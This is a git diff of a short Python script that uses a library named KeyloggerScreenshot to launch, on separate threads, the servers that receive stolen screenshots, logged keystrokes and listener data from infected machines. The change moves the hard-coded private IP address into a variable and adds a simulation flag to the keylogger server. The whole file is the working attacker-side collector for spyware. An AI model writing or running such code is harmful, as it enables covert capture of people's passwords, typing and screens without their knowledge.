@@ -1,14 +1,15 @@
-
-import KeyloggerScreenshot as ks 
+import KeyloggerScreenshot as ks
 import threading
 
-server_photos = ks.ServerPhotos("192.168.0.75", 1111)
+ip = "172.17.77.64"
 
-server_keylogger = ks.ServerKeylogger("192.168.0.75", 2222)
+server_photos = ks.ServerPhotos(ip, 1111)
 
-server_listener = ks.ServerListener("192.168.0.75", 3333)
+server_keylogger = ks.ServerKeylogger(ip, 2222, simulater=True)
 
-server_time = ks.Timer("192.168.0.75", 4444)
+server_listener = ks.ServerListener(ip, 3333)
+
+server_time = ks.Timer(ip, 4444)
 
 threading_server = threading.Thread(target=server_photos.start)
 threading_server.start()
@@ -20,4 +21,4 @@ threading_server3 = threading.Thread(target=server_listener.start)
 threading_server3.start()
 
 threading_server4 = threading.Thread(target=server_time.start_timer)
-threading_server4.start() 
\ No newline at end of file
+threading_server4.start() 
